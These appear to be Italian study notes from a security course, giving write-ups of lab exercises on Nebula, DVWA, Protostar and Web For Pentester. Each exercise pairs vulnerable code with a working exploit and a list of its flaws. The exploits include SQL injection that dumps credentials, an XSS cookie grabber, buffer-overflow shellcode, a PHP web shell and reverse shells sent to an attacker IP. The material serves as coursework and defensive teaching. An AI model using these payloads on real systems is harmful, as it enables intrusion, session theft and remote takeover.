# Nebula

  ```
  ssh levelXX@192.168.122.241
  Password: levelXX

  su - nebula
  Password: nebula
  
  sudo -s
  Password: nebula
  ```

  - **Livello 00**

    *Exploit*
    ```sh
    find / -perm -6000 -user root 2> /dev/null
    /bin/.../flag00
    ```

    *Problemi*
    * *Incorrect Default Permissions*: Il binario probabilmente non dovrebbe neanche essere reso accessibile ad altri utenti
    * *Least Privilege Violation*: Assegnazioni privilegi elevati al binario (se non fosse setuid non si otterrebbe nessun vantaggio, /bin/flag non otterrebbe la flag perchè non si diventerebbe flagXX)
  - **Livello 01**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/types.h>
    #include <stdio.h>

    int main(int argc, char **argv, char **envp)
    {
      gid_t gid;
      uid_t uid;
      gid = getegid();
      uid = geteuid();

      setresgid(gid, gid, gid);
      setresuid(uid, uid, uid);

      system("/usr/bin/env echo and now what?");
    }
    ```

    *Exploit*
    ```sh
    export PATH="$(pwd):$PATH"
    cp /bin/getflag echo
    /home/flag01/flag01
    ```

    *Problemi*
    * *Incorrect Default Permissions*: Il binario probabilmente non dovrebbe neanche essere reso accessibile ad altri utenti
    * *Least Privilege Violation*: Assegnazioni privilegi elevati al binario (se non fosse setuid non si otterrebbe nessun vantaggio, /bin/flag non otterrebbe la flag perchè non si diventerebbe flagXX)
    * *Least Privilege Violation*: Viene effettuata una privilege escalation permanente, che impedisce a /bin/bash (eseguito da system) di abbassare i privilegi quando viene invocata.
    Non effettuare una escalation permanente non sarebbe bastato perchè il /bin/bash presente su nebula non abbassa comunque i privilegi se invocato come /bin/sh.
    * *Untrusted Search Path*: Il PATH può essere manipolato per invocare un comando arbitrario. Si doveva
      - o hardcodare il path di echo
      - o settare il PATH manualmente prima di chiamare system
        ```C
        #include <stdlib.h>
        #include <unistd.h>
        #include <string.h>
        #include <sys/types.h>
        #include <stdio.h>

        int main(int argc, char **argv, char **envp)
        {
          gid_t gid;
          uid_t uid;
          gid = getegid();
          uid = geteuid();

          setresgid(gid, gid, gid);
          setresuid(uid, uid, uid);

          setenv("PATH", "/bin/:/usr/bin/", 1);
          system("/usr/bin/env echo and now what?");
        }
        ```
          
  - **Livello 02**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/types.h>
    #include <stdio.h>

    int main(int argc, char **argv, char **envp)
    {
      char *buffer;

      gid_t gid;
      uid_t uid;

      gid = getegid();
      uid = geteuid();

      setresgid(gid, gid, gid);
      setresuid(uid, uid, uid);

      buffer = NULL;

      asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
      printf("about to call system(\"%s\")\n", buffer);
      
      system(buffer);
    }
    ```

    *Exploit*
    ```sh
      export USER="; /bin/getflag #"
      /home/flag02/flag02
    ```
    
    *Problemi*
    * *Incorrect Default Permissions*: Il binario probabilmente non dovrebbe neanche essere reso accessibile ad altri utenti
    * *Least Privilege Violation*: Assegnazioni privilegi elevati al binario (se non fosse setuid non si otterrebbe nessun vantaggio, /bin/flag non otterrebbe la flag perchè non si diventerebbe flagXX)
    * *Least Privilege Violation*: Viene effettuata una privilege escalation permanente, che impedisce a /bin/bash (eseguito da system) di abbassare i privilegi quando viene invocata.
    Non effettuare una escalation permanente non sarebbe bastato perchè il /bin/bash presente su nebula non abbassa comunque i privilegi se invocato come /bin/sh.
    * *Improper Neutralization of Special Elements used in a Command*: L'input (ossia USER) non è sanitizzato prima di essere utilizzato per eseguire un comando.

  - **Livello 07**

    *Sorgente*
    ```perl
    #!/usr/bin/perl

    use CGI qw{param};

    print "Content-type: text/html\n\n";

    sub ping {
      $host = $_[0];

      print("<html><head><title>Ping results</title></head><body><pre>");

      @output = `ping -c 3 $host 2>&1`;
      foreach $line (@output) { print "$line"; }

      print("</pre></body></html>");
      
    }

    # check if Host set. if not, display normal page, etc

    ping(param("Host"));
    ```

    *Exploit - base*
    ```rest
      http://192.168.122.241:7007/index.cgi?Host=%3B%2Fbin%2Fgetflag
    ```

    *Exploit - avanzato*
    Si può iniettare una revershe shell: `bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`
    ```rest
      http://192.168.122.241:7007/index.cgi?Host=%3Bbash -i >%26 /dev/tcp/192.168.1.110/8888 0>%261
    ```

    *Problemi*
    * *Execution with Unnecessary Privileges*: Il webserver è eseguito come utente privilegiato (flag07), anche se non è necessario.
    * *Least Privilege Violation* Non viene utilizzata una chroot, nonostante sia consentito dal file di configurazione. Questo permette al web server di accedere a tutti i file/processi del file system
    * *Improper Neutralization of Special Elements used in a Command*: L'input (ossia host) non è sanitizzato prima di essere utilizzato per eseguire un comando => usare una blacklist.

    *Remind*
    - Escapare   (%3b)   ||  & (%26)   ||   # (%23)
  - **Livello 13**
  
    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <string.h>

    #define FAKEUID 1000

    int main(int argc, char **argv, char **envp)
    {
      int c;
      char token[256];

      if(getuid() != FAKEUID) {
          printf("Security failure detected. UID %d started us, we expect %d\n", getuid(), FAKEUID);
          printf("The system administrators will be notified of this violation\n");
          exit(EXIT_FAILURE);
      }

      // snip, sorry :)

      printf("your token is %s\n", token);
      
    }
    ```
    *Exploit*

    `libgetuid.c`
    ```C
    #include <unistd.h>
    #include <sys/types.h>

    uid_t getuid(void) {
            return 1000;
    }
    ```

    ```sh
    gcc -shared -fpic libgetuid.c libetuid.c -o libgetuid.so
    export LD_PRELOAD="/home/level13/libgetuid.so"
    cp /home/flag13/flag13 . # removes setuid
    ./flag13
    ```

    *Problemi*
    * *Authentication Bypass by Spoofing*: è utilizzato un dato spoofabile (real user id) come unico fattore di autenticazione => usare password o simili
    * *Untrusted Search Path*: è lasciata la possibilità di utilizzare un qualsiasi LD_PRELOAD per caricare le librerie (non si può fare molto in realtà)

# DVWA

  ```
  ssh snake@192.168.122.231
  Password: **

  http://192.168.122.231/dvwa/login.php
  Username: admin
  Password: password
  ```
  
  - **SQL Injection (difese basse)**
    *URL*
    ```
    http://192.168.122.231/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
    ```

    *Fuzzing*
    ```
    ?id=2
    => Gordon...

    ?id=-1
    => Ø
    
    ?id=adweq
    => Ø

    ?id="
    => Ø

    ?id=>'
    => crash => usa apici singoli
    ```

    *Exploit - tautologia*
    ```
    ?id=' or 1=1 #
    => Elenca tutti gli utenti
    ```

    *Exploit - enumerazione*
    ```
    ' UNION SELECT 1 #
    => The used SELECT statements have a different number of columns

    ' UNION SELECT 2 #
    => Funziona, ha 2 colonne

    ' UNION SELECT 1,schema_name from information_schema.schemata #
    => dvwa

    ' UNION SELECT 1,table_name from information_schema.tables where table_schema LiKE "dvwa" #
    => users, guestbook

    ' UNION SELECT 1,column_name from information_schema.columns where table_name LIKE "users" --
    => users_id, first_name, ...

    ' UNION SELECT concat("[", user_id, "] ", user, ":", password),2 from users #
    => elenca credenziali
    ```

    *Problemi*
    - L'input non è sanitizzato
    - [Vengono stampate tutte le righe della colonna anzichè una]

  - **XSS Stored (difese basse)**
    *URL*
    ```
    http://192.168.122.231/dvwa/vulnerabilities/xss_s/
    ```

    *Exploit - PoC*
    ```js
    <script>alert(1)</script>
    ```

    *Exploit - cookie grabber*
    ```js
    <img src=x onerror=this.src="http://192.168.1.110:8888/?c="+document.cookie>
    ```

    ```sh
    ➜  ~ nc -lvnp 8888
    Connessione da 192.168.1.110:35504
    GET /?c=security=low;%20PHPSESSID=dbipsej0h3umfr3s7ppri1rddj HTTP/1.1
    Host: 192.168.1.110:8888
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: image/webp,*/*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://192.168.122.231/dvwa/vulnerabilities/xss_s/
    ```

    *Exploit - use stolen cookie*
    ```
    echo -ne "GET /dvwa/ HTTP/1.1\r\nCookie: security=low; PHPSESSID=dbipsej0h3umfr3s7ppri1rddj\r\n\r\n" | nc 192.168.122.231 80
    => loggato
    ```

    *Problemi*
    * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML
      
  - **XSS Reflected (difese basse)**
    *URL*
    ```
    http://192.168.122.231/dvwa/vulnerabilities/xss_r/?name=stefano#
    ```

    *Exploit - PoC*
    ```
    ?name=<script>alert(1)</script>
    ```

    *Problemi*
    * *Improper Neutralization of Input During Web Page Generation*: l'input preso come parametro non è sanitizzato prima di essere riflesso alla pagina HTML
      
  - **Cross Site Request Forgery (difese basse)**
    *URL*
    ```
    http://192.168.122.231/dvwa/vulnerabilities/csrf/
    ```

    *Fuzzing*
    ```
    New password:         password2
    Confirm new password: password2

    http://192.168.122.231/dvwa/vulnerabilities/csrf/?password_new=password2&password_conf=password2&Change=Change#
    ```

    *Exploit - PoC*
    ```
    Inviare alla vittima un URL nella forma
    ?password_new=EVIL&password_conf=EVIL&Change=Change#
    ```

    *Exploit - simulazione aperta link*
    ```sh
    echo -ne "GET /dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change HTTP/1.0\r\nCookie: security=low; PHPSESSID=dbipsej0h3umfr3s7ppri1rddj\r\n\r\n" | nc 192.168.122.231 80
    => Password changed
    ```

    *Problemi*
    * *Cross-Site Request Forgery*: The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.
    
    *Mitigazione*
    * Utilizzare un CSRF token: valore pseudorandom con validità limitata (alla sessione/temporalmente) generato dal sito che deve essere fornito nella richiesta per essere considerata valida
    * Usare POST per operazione sensibili, perchè il semplice click non è più sufficiente

# Protostar

  ```
  ssh user@192.168.122.190
  Password: user

  su -
  Password: godmode
  ```

  - **Stack0**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    int main(int argc, char **argv)
    {
      volatile int modified;
      char buffer[64];

      modified = 0;
      gets(buffer);

      if(modified != 0) {
          printf("you have changed the 'modified' variable\n");
      } else {
          printf("Try again?\n");
      }
    }
    ```
    *Exploit*
    ```sh
    python 'print "a" * 65' | /opt/protostar/bin/stack0
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: gets non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare fgets
  
    *Mitigazioni indie*
    * Invertendo l'ordine di buffer e modified il buffer overflow non sarebbe più possibile

  - **Stack1**
  
    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
      volatile int modified;
      char buffer[64];

      if(argc == 1) {
          errx(1, "please specify an argument\n");
      }

      modified = 0;
      strcpy(buffer, argv[1]);

      if(modified == 0x61626364) {
          printf("you have correctly got the variable to the right value\n");
      } else {
          printf("Try again, you got 0x%08x\n", modified);
      }
    }
    ```
    *Exploit*
    ```sh
    /opt/protostar/bin/stack1 $(python -c 'print "a" * 64 + "\x61\x62\x63\x64"[::-1]')
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: strcpy non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare strncpy
  
    *Mitigazioni indie*
    * Invertendo l'ordine di buffer e modified il buffer overflow non sarebbe più possibile

  - **Stack2**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
      volatile int modified;
      char buffer[64];
      char *variable;

      variable = getenv("GREENIE");

      if(variable == NULL) {
          errx(1, "please set the GREENIE environment variable\n");
      }

      modified = 0;

      strcpy(buffer, variable);

      if(modified == 0x0d0a0d0a) {
          printf("you have correctly modified the variable\n");
      } else {
          printf("Try again, you got 0x%08x\n", modified);
      }

    }
    ```
    *Exploit*
    ```sh
    export GREENIE="$(python -c 'print "a" * 64 + "\x0d\x0a\x0d\x0a"[::-1]')"
    /opt/protostar/bin/stack2
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: strcpy non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare strncpy
  
    *Mitigazioni indie*
    * Invertendo l'ordine di buffer e modified il buffer overflow non sarebbe più possibile

    *Reminder*
    * Con /bin/sh, NON funziona `GREENIE=...`
    * Con /bin/sh, funziona `export GREENIE=...`
    * Con /bin/bash, funziona `GREENIE=...`
    * Con /bin/bash, funziona `export GREENIE=...`

  - **Stack3**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    void win()
    {
      printf("code flow successfully changed\n");
    }

    int main(int argc, char **argv)
    {
      volatile int (*fp)();
      char buffer[64];

      fp = 0;

      gets(buffer);

      if(fp) {
          printf("calling function pointer, jumping to 0x%08x\n", fp);
          fp();
      }
    }
    ```

    *Exploit*
    ```sh
    objdump -t /opt/protostar/bin/stack3 | grep win
    08048424 g     F .text	00000014              win

    python -c '
    print "a" * 64 + "\x08\x04\x84\x24"[::-1]' | /opt/protostar/bin/stack3
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: gets non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare fgets

  - **Stack4**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    void win()
    {
      printf("code flow successfully changed\n");
    }

    int main(int argc, char **argv)
    {
      char buffer[64];

      gets(buffer);
    }
    ```

    *Analisi*
    ```sh
    gdb /opt/protostar/bin/stack4

    (gdb) disassemble main
    Dump of assembler code for function main:
    0x08048408 <main+0>:	push   %ebp
    0x08048409 <main+1>:	mov    %esp,%ebp
    0x0804840b <main+3>:	and    $0xfffffff0,%esp
    0x0804840e <main+6>:	sub    $0x50,%esp
    0x08048411 <main+9>:	lea    0x10(%esp),%eax
    0x08048415 <main+13>:	mov    %eax,(%esp)
    0x08048418 <main+16>:	call   0x804830c <gets@plt>
    0x0804841d <main+21>:	leave  
    0x0804841e <main+22>:	ret    
    End of assembler dump.

    (gdb) b *main+16

    (gdb) r
    
    (gdb) x/a $esp
    0xbffff720:	0xbffff730

    (gdb) p $ebp
    $1 = (void *) 0xbffff778

    (gdb) q

    ---------------

    ipython
    In [1]: 0xbffff778-0xbffff730
    Out[1]: 72

    ---------------

    objdump -t /opt/protostar/bin/stack4  | grep win
    080483f4 g     F .text	00000014              win
    ```

    *Memory layout*
    ```
    HIGH
    ====

    ret_addr
    --------
    saved_ebp
    --------      0xbffff778
    ///////
    --------
    buffer[64]
    --------      0xbffff730
    ///////
    &buffer[4]
    --------      0xbffff720
    
    ====
    LOW
    ```

    *Exploit*
    ```sh
    python -c'
    print "a" * 76 + "\x08\x04\x83\xf4"[::-1]' | /opt/protostar/bin/stack4
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: gets non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare fgets

  - **Stack5**

    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
      char buffer[64];

      gets(buffer);
    }
    ```

    *Analisi*
    ```sh
    gdb /opt/protostar/bin/stack5

    (gdb) unset env LINES
    (gdb) unset env COLUMNS

    (gdb) disassemble main
    Dump of assembler code for function main:
    0x080483c4 <main+0>:	push   %ebp
    0x080483c5 <main+1>:	mov    %esp,%ebp
    0x080483c7 <main+3>:	and    $0xfffffff0,%esp
    0x080483ca <main+6>:	sub    $0x50,%esp
    0x080483cd <main+9>:	lea    0x10(%esp),%eax
    0x080483d1 <main+13>:	mov    %eax,(%esp)
    0x080483d4 <main+16>:	call   0x80482e8 <gets@plt>
    0x080483d9 <main+21>:	leave  
    0x080483da <main+22>:	ret    
    End of assembler dump.

    (gdb) b *main+16
    (gdb) r

    (gdb) x/x $esp
    0xbffffca0:	0xbffffcb0

    (gdb) p $esp
    $1 = (void *) 0xbffffca0

    ---------

    ipython
    In [1]: 0xbffffca0-0xbffff790
    Out[1]: 72
    
    ---------

    ```

    *Memory layout*
    ```
    HIGH
    ====

    ret_addr
    --------
    saved_ebp
    --------    0xbffffca0
    ///////[8]
    --------
    buffer[64]
    --------    0xbffffcb0
    ///////
    &buffer[4]
    --------
    
    ====
    LOW
    ```

    *Exploit*

    `shellcode.s`
    ```assembly
    xor %eax, %eax

    #int execve(const char *pathname, 
    #           char *const argv[],
    #           char *const envp[]);

    # "\0\0\0\0"
    push %eax

    # "hs//"
    push $0x68732f2f

    # "nib/"
    push $0x6e69622f

    # pathname
    mov %esp, %ebx

    # argv
    mov %eax, %ecx

    # envp
    mov %eax, %edx

    # syscall to execve
    mov $11, %al

    int $0x80
    ```

    ```sh
    gcc shellcode.s -c -o shellcode
    objdump -Ds shellcode

    00000000 <.text>:
    0:	31 c0                	xor    %eax,%eax
    2:	50                   	push   %eax
    3:	68 2f 2f 73 68       	push   $0x68732f2f
    8:	68 2f 62 69 6e       	push   $0x6e69622f
    d:	89 e3                	mov    %esp,%ebx
    f:	89 c1                	mov    %eax,%ecx
    11:	89 c2                	mov    %eax,%edx
    13:	b0 0b                	mov    $0xb,%al
    15:	cd 80                	int    $0x80
    ```

    `shellcode.py`
    ```python
    shellcode="\
    \x31\xc0\
    \x50\
    \x68\x2f\x2f\x73\x68\
    \x68\x2f\x62\x69\x6e\
    \x89\xe3\
    \x89\xc1\
    \x89\xc2\
    \xb0\x0b\
    \xcd\x80\
    "

    ret_addr = "\xbf\xff\xfc\xb0"[::-1]
    junk_len = 76 - len(shellcode)

    print shellcode + "a" * junk_len + ret_addr
    ```

    ```sh
    #!/bin/sh
    python shellcode.py > /tmp/payload
    (cat /tmp/payload; cat) | /opt/protostar/bin/stack5
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: gets non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare fgets
    * NX disabled

    *Remind*
    * Usare /bin/sh, anche per debuggare con gdb
    * Ricordarsi di fare `unset env LINES/COLUMNS`

  - **Stack6**


    *Sorgente*
    ```C
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    void getpath()
    {
      char buffer[64];
      unsigned int ret;

      printf("input path please: "); fflush(stdout);

      gets(buffer);

      ret = __builtin_return_address(0);

      if((ret & 0xbf000000) == 0xbf000000) {
        printf("bzzzt (%p)\n", ret);
        _exit(1);
      }

      printf("got path %s\n", buffer);
    }

    int main(int argc, char **argv)
    {
      getpath();
    }
    ```

    *Analisi*
    ```sh
    gdb /opt/protostar/bin/stack6

    (gdb) unset env LINES
    (gdb) unset env COLUMNS

    (gdb) disassemble getpath
    Dump of assembler code for function getpath:
    0x08048484 <getpath+0>:	push   %ebp
    0x08048485 <getpath+1>:	mov    %esp,%ebp
    0x08048487 <getpath+3>:	sub    $0x68,%esp
    0x0804848a <getpath+6>:	mov    $0x80485d0,%eax
    0x0804848f <getpath+11>:	mov    %eax,(%esp)
    0x08048492 <getpath+14>:	call   0x80483c0 <printf@plt>
    0x08048497 <getpath+19>:	mov    0x8049720,%eax
    0x0804849c <getpath+24>:	mov    %eax,(%esp)
    0x0804849f <getpath+27>:	call   0x80483b0 <fflush@plt>
    0x080484a4 <getpath+32>:	lea    -0x4c(%ebp),%eax
    0x080484a7 <getpath+35>:	mov    %eax,(%esp)
    0x080484aa <getpath+38>:	call   0x8048380 <gets@plt>
    0x080484af <getpath+43>:	mov    0x4(%ebp),%eax
    0x080484b2 <getpath+46>:	mov    %eax,-0xc(%ebp)
    0x080484b5 <getpath+49>:	mov    -0xc(%ebp),%eax
    0x080484b8 <getpath+52>:	and    $0xbf000000,%eax
    0x080484bd <getpath+57>:	cmp    $0xbf000000,%eax
    0x080484c2 <getpath+62>:	jne    0x80484e4 <getpath+96>
    0x080484c4 <getpath+64>:	mov    $0x80485e4,%eax
    0x080484c9 <getpath+69>:	mov    -0xc(%ebp),%edx
    0x080484cc <getpath+72>:	mov    %edx,0x4(%esp)
    0x080484d0 <getpath+76>:	mov    %eax,(%esp)
    0x080484d3 <getpath+79>:	call   0x80483c0 <printf@plt>
    0x080484d8 <getpath+84>:	movl   $0x1,(%esp)
    0x080484df <getpath+91>:	call   0x80483a0 <_exit@plt>
    0x080484e4 <getpath+96>:	mov    $0x80485f0,%eax
    0x080484e9 <getpath+101>:	lea    -0x4c(%ebp),%edx
    0x080484ec <getpath+104>:	mov    %edx,0x4(%esp)
    0x080484f0 <getpath+108>:	mov    %eax,(%esp)
    0x080484f3 <getpath+111>:	call   0x80483c0 <printf@plt>
    0x080484f8 <getpath+116>:	leave  
    0x080484f9 <getpath+117>:	ret

    (gdb) b *getpath+38
    (gdb) r

    (gdb) x/x $esp
    0xbffffca0:	0xbffffc9c

    (gdb) p $ebp
    $2 = (void *) 0xbffffce8

    (gdb) p system
    $2 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
    ---------

    ipython
    In [1]: 0xbffffce8-0xbffffc9c
    Out[1]: 76
    
    ---------

    ```


    *Memory layout*
    ```
    HIGH
    ====

    ret_addr
    --------
    saved_ebp
    --------    0xbffffce8
    ///////
    --------
    buffer[64]
    --------    0xbffffc9c
    ///////
    &buffer[4]
    --------
    
    ====
    LOW
    ```

    *Exploit*

    `stack6.py`
    ```python
    system = "\xb7\xec\xff\xb0"[::-1]
    buffer = "\xbf\xff\xfc\x9c"[::-1]

    param = "/bin/sh\x00"
    print param + (80 - len(param)) * "a" + system + "bbbb" + buffer 
    ```

    ```sh
    python stack6.py > /tmp/payload
    (cat /tmp/payload; cat) | /opt/protostar/bin/stack6
    ```

    *Problemi*
    * *Buffer Copy without Checking Size of Input*: gets non dovrebbe mai essere usata perché non verifica la dimensione dell'input => usare fgets

    *Remind*
    * Usare /bin/sh, anche per debuggare con gdb
    * Ricordarsi di fare `unset env LINES/COLUMNS`

# Web For Pentester

  ```
  ssh user@192.168.122.42
  Password: live
  ```

  - **Code Injection**
    - **Example1**
      *URL*
      ```
      http://192.168.122.42/codeexec/example1.php?name=hacker
      ```

      *Fuzzing*
      ```
      ?name=root
      => Hello root!!!

      ?name=<script>alert(1)</script>
      => stampa 1, XSS injection possibile

      ?name='
      => Hello '!!! 

      ?name="
      => Parse error: syntax error, unexpected '!', expecting ',' or ';' in /var/www/codeexec/example1.php(6) : eval()'d code on line 1 
      => quindi viene usato eval


      ```

      *Exploit - XSS*
      ```
      ?name=<img src=x onerror=this.src='http://192.168.1.110:8888?c='%2bdocument.cookie>
      ```

      *Soluzione - codice php*
      ```php
      $str="echo \"Hello ".$_GET['name']."!!!\";";
      eval($str);
      ```

      *Exploit - codice php*
      ```
      ?name="; system("/bin/ls") . "
      oppure
      ?name="; system("whoami"); //
      ```

      *Problemi*

      *Exploit*
  - **Commands Injection**
    - **Example1**
      *URL*
      ```
      http://192.168.122.42/commandexec/example1.php?ip=127.0.0.1
      ```

      *Exploit*
      ```
      ?ip=; whoami
      ```

      *Exploit - reverse shell*
      NON Funziona `bash -i >& /dev/tcp/192.168.1.110/8888 0>&1`, perchè viene eseguita da sh che non ha la concezione di `/dev/tcp/...`

      Bisogna prima startare `bash`
      ```
      ?ip=; bash -c 'bash -i >%26 /dev/tcp/192.168.1.110/8888 0>%261'
      ```

      oppure

      ```
      ?ip=; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>%261 | nc 192.168.1.110 8888 >/tmp/f
      ```

      *Problemi*
      * *Improper Neutralization of Special Elements used in a Command*: input fornito ad un comando non sanitizzato

    - **Example2**
      *URL*
      ```
      http://192.168.122.42/commandexec/example1.php?ip=127.0.0.1
      ```
      
      *Fuzzing*
      ```
      ?ip=; whoami
      => Invalid IP address

      ?ip=127.0.0.1; whoami
      => Invalid IP address
      ```

      *Soluzione*
      Viene greppato multiline, è sufficiente che la prima linea abbia come pattern un IP

      *Exploit - Proof Of Concept*
      ```
      ?ip=127.0.0.1%0Awhoami
      ```

      *Exploit - reverse shell*
      ```
      ?ip=127.0.0.1%0abash -c 'bash -i >%26 /dev/tcp/192.168.1.110/8888 0>%261'
      ```

      *Problemi*
      * *Improper Neutralization of Special Elements used in a Command*: input fornito ad un comando non sanitizzato

  - **Directory Traversal**
    - **Example1**
      *URL*
      ```
      http://192.168.122.42/dirtrav/example1.php?file=hacker.png
      ```

      *Fuzzing*
      ```
      ?file=/etc/passwd
      => nulla

      ?file=./hacker.png
      => funziona

      ?file=../etc/passwd
      => nulla

      ?file=../../etc/passwd
      => nulla

      ?file=../../../etc/passwd
      => funziona
      ```

      *Exploit - Proof Of Concept*
      ```
      ?file=../../../etc/passwd
      ```

      *Exploit - enumerazione sistema operativo*
      ```
      OS
      ?file=../../../etc/os-release
      ?file=../../../etc/lsb-release
      ?file=../../../proc/version

      PARTIZIONI
      ?file=../../../proc/mounts
      ?file=../../../etc/fstab

      RETE
      ?file=../../../etc/network/interfaces
      ?file=../../../etc/resolv.conf
      ?file=../../../etc/hostname
      ?file=../../../etc/hosts
      ?file=../../../proc/net/arp
      ?file=../../../proc/net/dev
      ?file=../../../proc/net/tcp
      ?file=../../../proc/net/udp

      MEMORIA
      ?file=../../../etc/crontab

      ALTRO
      ?file=../../../proc/meminfo

      PROCESSI
      ?file=../../../proc/1/cmdline
      ?file=../../../proc/2/cmdline
      ```

      *Problemi*
      * *Relative Path Traversal*: the software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. 
      * *Improper Control of Filename for Include/Require Statement in PHP Program*

    - **Example2**
      URL
      ```
      ?file=/var/www/files/hacker.png
      ```

      *Soluzione*
      Il path deve iniziare con `/var/www/files/`
      *Exploit - PoC*
      ```
      ?file=/var/www/files/../../../etc/passwd
      ```

      *Problemi*
      * *Relative Path Traversal*: the software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. 
      * *Improper Control of Filename for Include/Require Statement in PHP Program*

  - **File Include**
    - **Example 1**
      *URL*
      ```
      http://192.168.122.42/fileincl/example1.php?page=intro.php
      ```

      *Fuzzing*
      ```
      ?page=x
      =>

      Warning: include(x): failed to open stream: No such file or directory in /var/www/fileincl/example1.php on line 7
      Warning: include(): Failed opening 'x' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/fileincl/example1.php on line 7
      ```

      *Exploit - PoC*
      ```
      ?page=/etc/passwd
      ```

      *Exploit - enumerazione sistema*
      ...

      *Exploit - ottenimento file arbitrari in base64*
      ```
      ?page=php://filter/convert.base64-encode/resource=/usr/bin/whoami
      ```

      *Exploit - server side request forgery*
      [Usare la macchina vittima come proxy per richieste http]
      ```
      ?page=https://www.google.com
      ```

      *Exploit - scansione porte locale*
      ```
      ?page=http://localhost:22
      =>
      SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3
      ```

      *Problemi*
      * *Improper Control of Filename for Include/Require Statement in PHP Program*

    - **Example 2**
      *URL*
      ```
      http://192.168.122.42/fileincl/example2.php?page=intro
      ```

      *Fuzzing*
      ```
      ?page=/etc/passwd

      =>

      Warning: include(/etc/passwd.php): failed to open stream: No such file or directory in /var/www/fileincl/example2.php on line 8
      Warning: include(): Failed opening '/etc/passwd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/fileincl/example2.php on line 8
      ```

      *Soluzione*
      L'applicazione simula un vecchio bug di php in cui era possibile inserire un byte nullo per terminare l'input; %00 consente di non fare l'append di `.php`
      
      *Exploit - PoC*
      ```
      ?page=/etc/passwd%00
      ```

      *Problemi*
      * *Improper Control of Filename for Include/Require Statement in PHP Program*

  - **File Upload**
    - **Example 1**
      *URL*
      ```
      http://192.168.122.42/upload/example1.php
      ```

      *Fuzzing*
      ```
      Caricando file normale 01.txt, viene restituito sotto
      http://192.168.122.42/upload/images/01.txt
      ```

      *Soluzione*
      Caricare file .php da eseguire

      *Exploit - PoC*
      `whoami.php`
      ```php
      <?php system("whoami"); >
      ```

      ```
      http://192.168.122.42/upload/images/whoami.php
      => www-data
      ```

      *Exploit - system()*
      `system.php`
      ```php
      <?php
          if (isset($_GET["command"])) {
              echo "Command: " . $_GET["command"] . "<br>";
              system("/bin/bash -c '" . $_GET["command"] . "'"); 
          } else {
              echo "Please submit a command with ?command=";
          }
      ?>
      ```
      *Exploit - reverse shell with system.php*
      ```
      ?command=bash -i >%26 /dev/tcp/192.168.1.110/8888 0>%261
      ```

      *Problemi*
      * *Unrestricted Upload of File with Dangerous Type*: The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. 
      * Il tipo del file non è filtrato (.php e simili non dovrebbero essere permessi)
      * Il contenuto del file non è verificato
      * Il file è reso accessibile (e quindi eseguibile) all'esterno
      * Far si che la directory di upload non sia eseguibile dall'enginge PHP

    - **Example 2**
      *URL*
      ```
      http://192.168.122.42/upload/example2.php
      ```

      *Fuzzing*
      ```
      Caricando system.php
      =>  NO PHP
      ```

      *Soluzione*
      .php è blacklistato
      => usare un altro formato php eseguibile, e.g. php3


      *Exploit - system()*
      `system.php3`
      ```php
      <?php
          if (isset($_GET["command"])) {
              echo "Command: " . $_GET["command"] . "<br>";
              system("/bin/bash -c '" . $_GET["command"] . "'"); 
          } else {
              echo "Please submit a command with ?command=";
          }
      ?>

      ```
      *Exploit - PoC*
      ```
      ?command=whoami
      => www-data
      ```

      *Soluzione 2*
      => usare un doppio formato php.<ext> dove ext è non noto

      *Problemi*
      * *Unrestricted Upload of File with Dangerous Type*: The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. 
      * Il tipo del file non è filtrato (.php e simili non dovrebbero essere permessi)
      * Il contenuto del file non è verificato
      * Il file è reso accessibile (e quindi eseguibile) all'esterno
